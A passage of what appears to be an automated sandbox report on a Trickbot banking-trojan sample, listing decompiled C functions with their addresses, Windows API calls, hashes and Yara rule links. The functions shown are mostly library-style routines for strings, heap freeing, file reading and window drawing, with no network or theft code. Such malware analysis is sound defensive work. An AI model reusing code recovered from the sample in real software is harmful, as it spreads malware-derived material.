					_a11 =  *((intOrPtr*)(_t79 + _t73));
					_a16 = _t43 + _t73;
					_t54 = lstrcmpiA(_a12, _t73);
					asm("sbb eax, eax");
					_t56 =  ~_t54 + 1;
					__eflags = _t56;
					_a12 = _t56;
					 *((char*)(_t79 + _t73)) = _a11;
					if(_t56 == 0) {
						goto L5;
					}
					E0041D9E9(_a16,  &_v268, 0x104);
					lstrcpynA(_t73,  &_v268, 0x104);
					goto L7;
				}
				return 0;
			}

0x0041e4c0
0x0041e4c3
0x0041e4cd
0x0041e4e6
0x0041e4f2
0x0041e4fd
0x0041e504
0x0041e50e
0x0041e510
0x0041e513
0x0041e515
0x0041e561
0x0041e564
0x0041e568
0x0041e576
0x0041e579
0x0041e57e
0x0041e57e
0x0041e58b
0x0041e59b
0x0041e59b
0x0041e5a0
0x0041e5a5
0x0041e5ac
0x00000000
0x0041e5ae
0x0041e51a
0x0041e524
0x0041e527
0x0041e52a
0x0041e532
0x0041e534
0x0041e534
0x0041e535
0x0041e53b
0x0041e53e
0x00000000
0x00000000
0x0041e54b
0x0041e559
0x00000000
0x0041e559
0x00000000

APIs

lstrcpyA.KERNEL32(00000000,00000000,00000104), ref: 0041E4F2
lstrlenA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041E508
lstrcmpiA.KERNEL32(?,00000000), ref: 0041E52A
lstrcpynA.KERNEL32(00000000,?,00000104), ref: 0041E559

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: lstrcmpilstrcpylstrcpynlstrlen
String ID:
API String ID: 4224384254-0
Opcode ID: 5cbda47931067a0d2fd55e089f4ce8e0d71eff1479bb35dac2353a040323c55d
Instruction ID: f78754b319c355faeaaecf17be6717dd5136e3bd3a8142c56366dd4383a44a38
Opcode Fuzzy Hash: 5cbda47931067a0d2fd55e089f4ce8e0d71eff1479bb35dac2353a040323c55d
Instruction Fuzzy Hash: 4931BCB6500148FFCB20DFA8CC85EEA3BB9AB48318F10416AF8459B291E774DD81DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00408204, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 264
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00408204(signed int* _a4, signed char _a8, char _a11) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				intOrPtr _t165;
				intOrPtr* _t166;
				intOrPtr _t167;
				signed int* _t168;
				intOrPtr _t170;
				intOrPtr _t171;
				intOrPtr _t173;
				intOrPtr _t175;
				intOrPtr _t177;
				signed int _t179;
				intOrPtr _t182;
				signed int _t187;
				signed int* _t195;
				signed int _t199;
				signed int _t201;
				signed int _t206;
				signed int _t209;
				signed char _t212;
				signed int _t213;
				intOrPtr _t219;
				char _t220;
				char _t221;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t234;
				signed char _t236;
				char* _t239;
				char* _t241;
				signed char _t244;
				intOrPtr _t247;
				signed char _t248;
				char* _t251;
				char* _t253;
				signed char _t255;
				signed int* _t256;
				intOrPtr _t259;
				signed int _t261;
				signed int _t267;
				signed int _t270;
				signed int _t274;
				signed char _t280;
				intOrPtr _t282;
				signed int _t285;
				signed int _t288;
				signed int _t291;
				void* _t320;

				_t255 = _a8;
				_t195 = _a4;
				_t3 = _t195 + 0x10; // 0x5756006a
				_t165 =  *_t3;
				_t4 = _t195 + 0xc; // 0x6ac35b
				_t5 = _t255 - 4; // 0x21b1
				_t256 = _t255 + 0xfffffffc;
				_t291 = _t255 -  *_t4 >> 0xf;
				_t6 = _t256 - 4; // 0x6a006a
				_t187 =  *_t5 - 1;
				_v8 =  *_t6;
				_v16 = _t187;
				_v20 = _t291 * 0x204 + _t165 + 0x144;
				_t199 =  *(_t256 + _t187);
				_v12 = _t199;
				if((_t199 & 0x00000001) != 0) {
					L10:
					_t274 = (_t187 >> 4) - 1;
					if(_t274 > 0x3f) {
						_t274 = 0x3f;
					}
					_t201 = _v8 & 0x00000001;
					_v24 = _t201;
					if(_t201 == 0) {
						_v12 = _t256 - _v8;
						_t230 = (_v8 >> 4) - 1;
						_t261 = 0x3f;
						_a8 = _t230;
						if(_t230 > _t261) {
							_a8 = _t261;
							_t230 = _t261;
						}
						_t187 = _t187 + _v8;
						_v16 = _t187;
						_t274 = (_t187 >> 4) - 1;
						if(_t274 > _t261) {
							_t274 = _t261;
						}
						if(_t230 != _t274) {
							_t231 = _v12;
							_t66 = _t231 + 4; // 0x75ff8504
							_t67 = _t231 + 8; // 0x5d5e5f05
							if( *_t66 ==  *_t67) {
								_t236 = _a8;
								if(_t236 >= 0x20) {
									_t80 = _t165 + 4; // 0x75ff8504
									_t239 = _a8 + _t80;
									_t267 =  !(0x80000000 >> _t236 + 0xffffffe0);
									 *(_t165 + 0xc4 + _t291 * 4) =  *(_t165 + 0xc4 + _t291 * 4) & 0x80000000;
									 *_t239 =  *_t239 - 1;
									if( *_t239 == 0) {
										_a4[1] = _a4[1] & _t267;
									}
								} else {
									_t70 = _t165 + 4; // 0x75ff8504
									_t241 = _t236 + _t70;
									_t270 =  !(0x80000000 >> _t236);
									 *(_t165 + 0x44 + _t291 * 4) =  *(_t165 + 0x44 + _t291 * 4) & 0x80000000;
									 *_t241 =  *_t241 - 1;
									if( *_t241 == 0) {
										 *_a4 =  *_a4 & _t270;
									}
								}
							}
							_t232 = _v12;
							_t91 = _t232 + 8; // 0x5d5e5f05
							_t92 = _t232 + 4; // 0x75ff8504
							 *((intOrPtr*)( *_t91 + 4)) =  *_t92;
							_t234 = _v12;
							_t95 = _t234 + 4; // 0x75ff8504
							_t96 = _t234 + 8; // 0x5d5e5f05
							 *((intOrPtr*)( *_t95 + 8)) =  *_t96;
						}
						_t256 = _v12;
					}
					if(_v24 != 0 || _a8 != _t274) {
						_t104 = _v20 + _t274 * 8 + 4; // 0xe004247c
						_t256[1] =  *_t104;
						_t206 = _v20 + _t274 * 8;
						_t256[2] = _t206;
						 *(_t206 + 4) = _t256;
						_t111 =  &(_t256[1]); // 0x6a006a
						 *( *_t111 + 8) = _t256;
						_t113 =  &(_t256[1]); // 0x6a006a
						_t114 =  &(_t256[2]); // 0x6ad6ff
						if( *_t113 ==  *_t114) {
							_t220 =  *((intOrPtr*)(_t274 + _t165 + 4));
							_a11 = _t220;
							_t221 = _t220 + 1;
							 *((char*)(_t274 + _t165 + 4)) = _t221;
							if(_t221 >= 0) {
								if(_a11 == 0) {
									_t126 = _t274 - 0x20; // 0x218f
									_a4[1] = _a4[1] | 0x80000000 >> _t126;
								}
								_t130 = _t274 - 0x20; // 0x218f
								 *(_t165 + 0xc4 + _t291 * 4) =  *(_t165 + 0xc4 + _t291 * 4) | 0x80000000 >> _t130;
							} else {
								if(_a11 == 0) {
									 *_a4 =  *_a4 | 0x80000000 >> _t274;
								}
								 *(_t165 + 0x44 + _t291 * 4) =  *(_t165 + 0x44 + _t291 * 4) | 0x80000000 >> _t274;
							}
							_t187 = _v16;
						}
					}
					_t166 = _v20;
					 *_t256 = _t187;
					_t137 = _t256 - 4; // 0xc483f88b
					 *(_t187 + _t137) = _t187;
					 *_t166 =  *_t166 - 1;
					if( *_t166 != 0) {
						return _t166;
					} else {
						_t167 =  *0x44d0b0; // 0x0
						if(_t167 == 0) {
							L45:
							_t168 = _a4;
							L46:
							 *0x44d0b0 = _t168;
							 *0x44d0a8 = _t291;
							return _t168;
						}
						_t209 =  *0x44d0a8; // 0x0
						VirtualFree((_t209 << 0xf) +  *((intOrPtr*)(_t167 + 0xc)), 0x8000, 0x4000);
						_t212 =  *0x44d0a8; // 0x0
						_t170 =  *0x44d0b0; // 0x0
						 *(_t170 + 8) =  *(_t170 + 8) | 0x80000000 >> _t212;
						_t171 =  *0x44d0b0; // 0x0
						_t213 =  *0x44d0a8; // 0x0
						 *( *((intOrPtr*)(_t171 + 0x10)) + 0xc4 + _t213 * 4) =  *( *((intOrPtr*)(_t171 + 0x10)) + 0xc4 + _t213 * 4) & 0x00000000;
						_t173 =  *0x44d0b0; // 0x0
						 *((char*)( *((intOrPtr*)(_t173 + 0x10)) + 0x43)) =  *((char*)( *((intOrPtr*)(_t173 + 0x10)) + 0x43)) - 1;
						_t175 =  *0x44d0b0; // 0x0
						if( *((char*)( *((intOrPtr*)(_t175 + 0x10)) + 0x43)) == 0) {
							 *(_t175 + 4) =  *(_t175 + 4) & 0xfffffffe;
							_t175 =  *0x44d0b0; // 0x0
						}
						if( *((intOrPtr*)(_t175 + 8)) != 0xffffffff) {
							goto L45;
						} else {
							VirtualFree( *(_t175 + 0xc), 0, 0x8000);
							_t177 =  *0x44d0b0; // 0x0
							HeapFree( *0x44d0bc, 0,  *(_t177 + 0x10));
							_t179 =  *0x44d0b4; // 0x1
							_t259 =  *0x44d0b8; // 0x13507d0
							_t182 =  *0x44d0b0; // 0x0
							_t162 = _t182 + 0x14; // 0x14
							E00405BD0(_t182, _t162, (_t179 + _t179 * 4 << 2) - _t182 + _t259 - 0x14);
							_t168 = _a4;
							 *0x44d0b4 =  *0x44d0b4 - 1;
							_t320 = _t168 -  *0x44d0b0; // 0x0
							if(_t320 > 0) {
								_t168 = _t168 - 0x14;
							}
							_t219 =  *0x44d0b8; // 0x13507d0
							 *0x44d0ac = _t219;
							goto L46;
						}
					}
				} else {
					_t244 = (_t199 >> 4) - 1;
					_t280 = 0x3f;
					_a8 = _t244;
					if(_t244 > _t280) {
						_a8 = _t280;
					}
					if( *((intOrPtr*)( &(_t256[1]) + _t187)) ==  *((intOrPtr*)( &(_t256[2]) + _t187))) {
						_t248 = _a8;
						if(_t248 >= 0x20) {
							_t34 = _t165 + 4; // 0x75ff8504
							_t251 = _a8 + _t34;
							_t285 =  !(0x80000000 >> _t248 + 0xffffffe0);
							 *(_t165 + 0xc4 + _t291 * 4) =  *(_t165 + 0xc4 + _t291 * 4) & 0x80000000;
							 *_t251 =  *_t251 - 1;
							if( *_t251 == 0) {
								_a4[1] = _a4[1] & _t285;
							}
						} else {
							_t24 = _t165 + 4; // 0x75ff8504
							_t253 = _t248 + _t24;
							_t288 =  !(0x80000000 >> _t248);
							 *(_t165 + 0x44 + _t291 * 4) =  *(_t165 + 0x44 + _t291 * 4) & 0x80000000;
							 *_t253 =  *_t253 - 1;
							if( *_t253 == 0) {
								 *_a4 =  *_a4 & _t288;
							}
						}
					}
					 *((intOrPtr*)( *((intOrPtr*)( &(_t256[2]) + _t187)) + 4)) =  *((intOrPtr*)( &(_t256[1]) + _t187));
					_t247 =  *((intOrPtr*)( &(_t256[1]) + _t187));
					_t282 =  *((intOrPtr*)( &(_t256[2]) + _t187));
					_t187 = _t187 + _v12;
					 *((intOrPtr*)(_t247 + 8)) = _t282;
					_v16 = _t187;
					goto L10;
				}
			}

0x0040820a
0x0040820d
0x00408212
0x00408212
0x00408217
0x0040821a
0x0040821d
0x00408221
0x00408226
0x0040822f
0x00408230
0x0040823a
0x0040823d
0x00408240
0x00408246
0x00408249
0x004082ca
0x004082cf
0x004082d3
0x004082d7
0x004082d7
0x004082db
0x004082de
0x004082e1
0x004082f2
0x004082f5
0x004082f6
0x004082f9
0x004082fc
0x004082fe
0x00408301
0x00408301
0x00408303
0x00408308
0x0040830e
0x00408311
0x00408313
0x00408313
0x00408317
0x00408319
0x0040831c
0x0040831f
0x00408322
0x00408324
0x0040832a
0x00408355
0x00408355
0x00408359
0x0040835b
0x00408362
0x00408364
0x00408369
0x00408369
0x0040832c
0x00408333
0x00408333
0x00408337
0x00408339
0x0040833d
0x0040833f
0x00408344
0x00408344
0x0040833f
0x0040832a
0x0040836c
0x0040836f
0x00408372
0x00408375
0x00408378
0x0040837b
0x0040837e
0x00408381
0x00408381
0x00408384
0x00408384
0x0040838b
0x0040839c
0x0040839f
0x004083a5
0x004083a8
0x004083ab
0x004083ae
0x004083b1
0x004083b4
0x004083b7
0x004083ba
0x004083bc
0x004083c3
0x004083c6
0x004083c8
0x004083cc
0x004083f7
0x004083f9
0x00408406
0x00408406
0x00408409
0x0040841a
0x004083ce
0x004083d2
0x004083e0
0x004083e0
0x004083ef
0x004083ef
0x0040841c
0x0040841c
0x004083ba
0x0040841f
0x00408422
0x00408424
0x00408424
0x00408428
0x0040842a
0x0040852e
0x00408430
0x00408430
0x00408437
0x0040851c
0x0040851c
0x0040851f
0x0040851f
0x00408524
0x00000000
0x00408524
0x0040843d
0x0040845b
0x0040845d
0x00408463
0x0040846f
0x00408472
0x00408477
0x00408480
0x00408488
0x00408490
0x00408493
0x0040849f
0x004084a1
0x004084a5
0x004084a5
0x004084ae
0x00000000
0x004084b0
0x004084b6
0x004084b8
0x004084c8
0x004084ce
0x004084d3
0x004084e1
0x004084ed
0x004084f2
0x004084f7
0x004084fd
0x00408503
0x00408509
0x0040850b
0x0040850b
0x0040850e
0x00408514
0x00000000
0x00408514
0x004084ae
0x0040824b
0x00408250
0x00408251
0x00408252
0x00408257
0x00408259
0x00408259
0x00408264
0x00408266
0x0040826c
0x00408297
0x00408297
0x0040829b
0x0040829d
0x004082a4
0x004082a6
0x004082ab
0x004082ab
0x0040826e
0x00408275
0x00408275
0x00408279
0x0040827b
0x0040827f
0x00408281
0x00408286
0x00408286
0x00408281
0x0040826c
0x004082b6
0x004082b9
0x004082bd
0x004082c1
0x004082c4
0x004082c7
0x00000000
0x004082c7

APIs

VirtualFree.KERNEL32(?,00008000,00004000,00000000,j/@,00000000), ref: 0040845B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 004084B6
HeapFree.KERNEL32(00000000,?), ref: 004084C8

Strings

j/@, xrefs: 00408211

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Free$Virtual$Heap
String ID: j/@
API String ID: 2016334554-13740958
Opcode ID: 9398784c202d3c12fe2028f5fe0b8331a764e9df01002e798e1e32a16c2a6827
Instruction ID: 042dcbe8a8a06e0e521ddce9e0779ee64613f054c7a1be9f6aaeea80637108d5
Opcode Fuzzy Hash: 9398784c202d3c12fe2028f5fe0b8331a764e9df01002e798e1e32a16c2a6827
Instruction Fuzzy Hash: E3B15435A00205DFDB14CF44C990A69BBA2FF95328F25C2AED84A5B392DB35ED46CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00414DD2, Relevance: 6.2, APIs: 4, Instructions: 170
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00414DD2(signed int _a4, signed int _a8, long _a12) {
				void _v5;
				signed int _v12;
				long _v16;
				signed int _t75;
				void* _t78;
				intOrPtr _t82;
				signed char _t83;
				signed char _t85;
				long _t86;
				void* _t88;
				signed char _t90;
				signed char _t91;
				signed int _t95;
				intOrPtr _t96;
				char _t98;
				signed int _t99;
				long _t101;
				long _t102;
				signed int _t103;
				intOrPtr _t106;
				signed int _t108;
				signed int _t109;
				signed int _t111;
				signed char _t112;
				signed char* _t113;
				long _t115;
				void* _t119;
				signed int _t120;
				intOrPtr* _t121;
				signed int _t123;
				signed char* _t124;
				void* _t125;
				void* _t126;

				_v12 = _v12 & 0x00000000;
				_t108 = _a8;
				_t119 = _t108;
				if(_a12 == 0) {
					L42:
					__eflags = 0;
					return 0;
				}
				_t75 = _a4;
				_t111 = _t75 >> 5;
				_t121 = 0x44cfa0 + _t111 * 4;
				_t123 = (_t75 & 0x0000001f) + (_t75 & 0x0000001f) * 8 << 2;
				_t78 =  *((intOrPtr*)(0x44cfa0 + _t111 * 4)) + _t123;
				_t112 =  *((intOrPtr*)(_t78 + 4));
				if((_t112 & 0x00000002) != 0) {
					goto L42;
				}
				if((_t112 & 0x00000048) != 0) {
					_t106 =  *((intOrPtr*)(_t78 + 5));
					if(_t106 != 0xa) {
						_a12 = _a12 - 1;
						 *_t108 = _t106;
						_t119 = _t108 + 1;
						_v12 = 1;
						 *((char*)( *_t121 + _t123 + 5)) = 0xa;
					}
				}
				if(ReadFile( *( *_t121 + _t123), _t119, _a12,  &_v16, 0) != 0) {
					_t82 =  *_t121;
					_t120 = _v16;
					_v12 = _v12 + _t120;
					_t31 = _t123 + 4; // 0x4
					_t113 = _t82 + _t31;
					_t83 =  *((intOrPtr*)(_t82 + _t123 + 4));
					__eflags = _t83 & 0x00000080;
					if((_t83 & 0x00000080) == 0) {
						L41:
						return _v12;
					}
					__eflags = _t120;
					if(_t120 == 0) {
						L15:
						_t85 = _t83 & 0x000000fb;
						__eflags = _t85;
						L16:
						 *_t113 = _t85;
						_t86 = _a8;
						_a12 = _t86;
						_t115 = _v12 + _t86;
						__eflags = _t86 - _t115;
						_v12 = _t115;
						if(_t86 >= _t115) {
							L40:
							_t109 = _t108 - _a8;
							__eflags = _t109;
							_v12 = _t109;
							goto L41;
						} else {
							goto L17;
						}
						while(1) {
							L17:
							_t88 =  *_a12;
							__eflags = _t88 - 0x1a;
							if(_t88 == 0x1a) {
								break;
							}
							__eflags = _t88 - 0xd;
							if(_t88 == 0xd) {
								__eflags = _a12 - _t115 - 1;
								if(_a12 >= _t115 - 1) {
									_a12 = _a12 + 1;
									_t95 = ReadFile( *( *_t121 + _t123),  &_v5, 1,  &_v16, 0);
									__eflags = _t95;
									if(_t95 != 0) {
										L26:
										__eflags = _v16;
										if(_v16 == 0) {
											L34:
											 *_t108 = 0xd;
											L35:
											_t108 = _t108 + 1;
											__eflags = _t108;
											L36:
											_t115 = _v12;
											__eflags = _a12 - _t115;
											if(_a12 < _t115) {
												continue;
											}
											goto L40;
										}
										_t96 =  *_t121;
										__eflags =  *(_t96 + _t123 + 4) & 0x00000048;
										if(( *(_t96 + _t123 + 4) & 0x00000048) == 0) {
											__eflags = _t108 - _a8;
											if(__eflags != 0) {
												L33:
												E0040BA83(__eflags, _a4, 0xffffffff, 1);
												_t126 = _t126 + 0xc;
												__eflags = _v5 - 0xa;
												if(_v5 == 0xa) {
													goto L36;
												}
												goto L34;
											}
											__eflags = _v5 - 0xa;
											if(__eflags != 0) {
												goto L33;
											}
											L32:
											 *_t108 = 0xa;
											goto L35;
										}
										_t98 = _v5;
										__eflags = _t98 - 0xa;
										if(_t98 == 0xa) {
											goto L32;
										}
										 *_t108 = 0xd;
										_t108 = _t108 + 1;
										 *((char*)( *_t121 + _t123 + 5)) = _t98;
										goto L36;
									}
									_t99 = GetLastError();
									__eflags = _t99;
									if(_t99 != 0) {
										goto L34;
									}
									goto L26;
								}
								_t101 = _a12 + 1;
								__eflags =  *_t101 - 0xa;
								if( *_t101 != 0xa) {
									 *_t108 = 0xd;
									_t108 = _t108 + 1;
									_a12 = _t101;
									goto L36;
								}
								_a12 = _a12 + 2;
								goto L32;
							}
							 *_t108 = _t88;
							_t108 = _t108 + 1;
							_a12 = _a12 + 1;
							goto L36;
						}
						_t124 =  *_t121 + _t123 + 4;
						_t90 =  *_t124;
						__eflags = _t90 & 0x00000040;
						if((_t90 & 0x00000040) == 0) {
							_t91 = _t90 | 0x00000002;
							__eflags = _t91;
							 *_t124 = _t91;
						}
						goto L40;
					}
					__eflags =  *_t108 - 0xa;
					if( *_t108 != 0xa) {
						goto L15;
					}
					_t85 = _t83 | 0x00000004;
					goto L16;
				}
				_t102 = GetLastError();
				_t125 = 5;
				if(_t102 != _t125) {
					__eflags = _t102 - 0x6d;
					if(_t102 == 0x6d) {
						goto L42;
					}
					_t103 = E004067ED(_t102);
					L10:
					return _t103 | 0xffffffff;
				}
				 *((intOrPtr*)(E00406860())) = 9;
				_t103 = E00406869();
				 *_t103 = _t125;
				goto L10;
			}

0x00414dd8
0x00414de1
0x00414de6
0x00414de8
0x00414fa4
0x00414fa4
0x00000000
0x00414fa4
0x00414dee
0x00414df6
0x00414e03
0x00414e0a
0x00414e0d
0x00414e0f
0x00414e15
0x00000000
0x00000000
0x00414e1e
0x00414e20
0x00414e25
0x00414e27
0x00414e2a
0x00414e2e
0x00414e31
0x00414e38
0x00414e38
0x00414e25
0x00414e54
0x00414e8f
0x00414e91
0x00414e94
0x00414e97
0x00414e97
0x00414e9b
0x00414e9f
0x00414ea1
0x00414f9f
0x00000000
0x00414f9f
0x00414ea7
0x00414ea9
0x00414eb4
0x00414eb4
0x00414eb4
0x00414eb6
0x00414eb6
0x00414eb8
0x00414ebe
0x00414ec1
0x00414ec3
0x00414ec5
0x00414ec8
0x00414f99
0x00414f99
0x00414f99
0x00414f9c
0x00000000
0x00000000
0x00000000
0x00000000
0x00414ece
0x00414ece
0x00414ed1
0x00414ed3
0x00414ed5
0x00000000
0x00000000
0x00414edb
0x00414edd
0x00414eeb
0x00414eee
0x00414f0e
0x00414f1c
0x00414f22
0x00414f24
0x00414f30
0x00414f30
0x00414f34
0x00414f77
0x00414f77
0x00414f7a
0x00414f7a
0x00414f7a
0x00414f7b
0x00414f7b
0x00414f7e
0x00414f81
0x00000000
0x00000000
0x00000000
0x00414f87
0x00414f36
0x00414f38
0x00414f3d
0x00414f52
0x00414f55
0x00414f62
0x00414f69
0x00414f6e
0x00414f71
0x00414f75
0x00000000
0x00000000
0x00000000
0x00414f75
0x00414f57
0x00414f5b
0x00000000
0x00000000
0x00414f5d
0x00414f5d
0x00000000
0x00414f5d
0x00414f3f
0x00414f42
0x00414f44
0x00000000
0x00000000
0x00414f46
0x00414f4b
0x00414f4c
0x00000000
0x00414f4c
0x00414f26
0x00414f2c
0x00414f2e
0x00000000
0x00000000
0x00000000
0x00414f2e
0x00414ef3
0x00414ef4
0x00414ef7
0x00414eff
0x00414f02
0x00414f03
0x00000000
0x00414f03
0x00414ef9
0x00000000
0x00414ef9
0x00414edf
0x00414ee1
0x00414ee2
0x00000000
0x00414ee2
0x00414f8b
0x00414f8f
0x00414f91
0x00414f93
0x00414f95
0x00414f95
0x00414f97
0x00414f97
0x00000000
0x00414f93
0x00414eab
0x00414eae
0x00000000
0x00000000
0x00414eb0
0x00000000
0x00414eb0
0x00414e56
0x00414e5e
0x00414e61
0x00414e77
0x00414e7a
0x00000000
0x00000000
0x00414e81
0x00414e87
0x00000000
0x00414e87
0x00414e68
0x00414e6e
0x00414e73
0x00000000

APIs

ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00414E4C
GetLastError.KERNEL32(?,?), ref: 00414E56
ReadFile.KERNEL32(?,?,00000001,?,00000000), ref: 00414F1C
GetLastError.KERNEL32(?,?), ref: 00414F26

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 6a04b9401edfdf0255cc1e1e77202a38224b77e703b3c2fe6b795ef2b0e4e6dd
Instruction ID: d9f3edf35bd78f5494cf6d694dabbaf9feb375bf1f1fd386cc1f865da9e8df43
Opcode Fuzzy Hash: 6a04b9401edfdf0255cc1e1e77202a38224b77e703b3c2fe6b795ef2b0e4e6dd
Instruction Fuzzy Hash: C951B634604389DFDF218F98C884BDA7BB0BF86309F14449BE8659B391D3789987CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004252CC, Relevance: 6.1, APIs: 4, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004252CC() {
				void* __ecx;
				void* __ebp;
				void* _t46;
				intOrPtr _t49;
				void* _t91;
				struct tagRECT* _t92;
				intOrPtr* _t94;
				signed int _t107;
				intOrPtr _t112;
				void* _t116;
				intOrPtr* _t117;
				intOrPtr* _t118;
				signed int _t121;
				signed int _t122;
				intOrPtr* _t123;
				intOrPtr _t124;
				void* _t129;

				_t124 =  *((intOrPtr*)(_t129 + 0xc));
				_t123 = _t94;
				if(_t124 != 0) {
					_t117 = _t123 + 0x90;
					 *((intOrPtr*)( *_t123 + 0x100))(_t117, _t116, _t91);
					if(_t124 < 0x12d || _t124 > 0x20d) {
						_t49 =  *_t123;
						_t92 = _t123 + 0xa0;
						_push(_t92);
						if(_t124 != 3) {
							 *((intOrPtr*)(_t49 + 0x104))(_t124);
							goto L8;
						}
						 *((intOrPtr*)(_t49 + 0x104))(1);
						_t112 =  *_t123;
						 *((intOrPtr*)(_t129 + 0x10)) =  *((intOrPtr*)(_t123 + 0x8c));
						 *((intOrPtr*)(_t123 + 0x84)) = 1;
						 *((intOrPtr*)(_t112 + 0x104))(2, _t123 + 0xb0);
						 *((intOrPtr*)(_t123 + 0x8c)) =  *((intOrPtr*)(_t129 + 0x10));
						asm("cdq");
						OffsetRect(_t92, 0,  *((intOrPtr*)(_t117 + 0xc)) -  *((intOrPtr*)(_t117 + 4)) - _t112 >> 1);
						asm("cdq");
						OffsetRect(_t123 + 0xb0,  *((intOrPtr*)(_t117 + 8)) -  *_t117 - _t112 >> 1, 0);
						goto L4;
					} else {
						_t92 = _t123 + 0xa0;
						_t121 = _t124 - 0x12d;
						asm("cdq");
						_t107 = 0xf;
						 *((intOrPtr*)( *_t123 + 0x104))(_t121 / _t107 + 0x65, _t92);
						asm("cdq");
						_t122 = 0xf;
						 *((intOrPtr*)(_t123 + 0x84)) = 1;
						 *((intOrPtr*)( *_t123 + 0x104))(_t121 % _t122 + 0xc9, _t123 + 0xb0);
						L4:
						_t124 =  *((intOrPtr*)(_t129 + 0x18));
						L8:
						_t118 =  *((intOrPtr*)( *_t123 + 0xe0))(0, 0);
						if(_t118 != 0 && E0041C5C7(_t118, 0x43be88) != 0) {
							 *((intOrPtr*)( *_t118 + 0xe8))(0, E00419D7A(_t123));
						}
						E0041884D(_t124, SetCapture( *(_t123 + 0x1c)));
						E0041B83C(_t123);
						RedrawWindow( *(_t123 + 0x1c), 0, 0, 0x180);
						 *((intOrPtr*)(_t123 + 0x80)) = 1;
						 *((intOrPtr*)( *_t123 + 0xc4))(_t92);
						if( *((intOrPtr*)(_t123 + 0x84)) != 0) {
							 *((intOrPtr*)( *_t123 + 0xc4))(_t123 + 0xb0);
						}
						 *((intOrPtr*)(_t123 + 0xc0)) = _t124;
						return  *((intOrPtr*)( *_t123 + 0x114))(_t124);
					}
				}
				return _t46;
			}

0x004252ce
0x004252d3
0x004252d7
0x004252e1
0x004252e8
0x004252f4
0x00425362
0x00425364
0x0042536d
0x0042536e
0x004253e3
0x00000000
0x004253e3
0x00425374
0x00425386
0x00425388
0x00425397
0x004253a1
0x004253ab
0x004253ba
0x004253c3
0x004253cc
0x004253d9
0x00000000
0x004252fe
0x004252fe
0x00425304
0x00425311
0x00425312
0x0042531b
0x00425334
0x00425335
0x0042533c
0x0042534d
0x00425359
0x00425359
0x004253e9
0x004253f7
0x004253fb
0x0042541b
0x0042541b
0x0042542b
0x00425432
0x00425443
0x0042544e
0x00425458
0x00425466
0x00425473
0x00425473
0x0042547e
0x00000000
0x00425484
0x004252f4
0x0042548d

APIs

OffsetRect.USER32(?,00000000,?), ref: 004253C3
OffsetRect.USER32(?,?,00000000), ref: 004253D9
SetCapture.USER32(?), ref: 00425424
RedrawWindow.USER32(?,00000000,00000000,00000180), ref: 00425443

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: OffsetRect$CaptureRedrawWindow
String ID:
API String ID: 1977905163-0
Opcode ID: d7b0343ac6f92285979404101ce89f9e4ad66bd3ceee71ae46167eac0636048b
Instruction ID: 76443f4b5d8bdb97f7461ede94f69d2c64a5c100c535cf431055f2cae8812015
Opcode Fuzzy Hash: d7b0343ac6f92285979404101ce89f9e4ad66bd3ceee71ae46167eac0636048b
Instruction Fuzzy Hash: 835181713007059FD7209F69D848FABB7E9FF88700F44452EF99AC7281DBB4A8448B54

Uniqueness

Uniqueness Score: -1.00%

Function 0042A36A, Relevance: 6.1, APIs: 4, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0042A36A(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _t79;
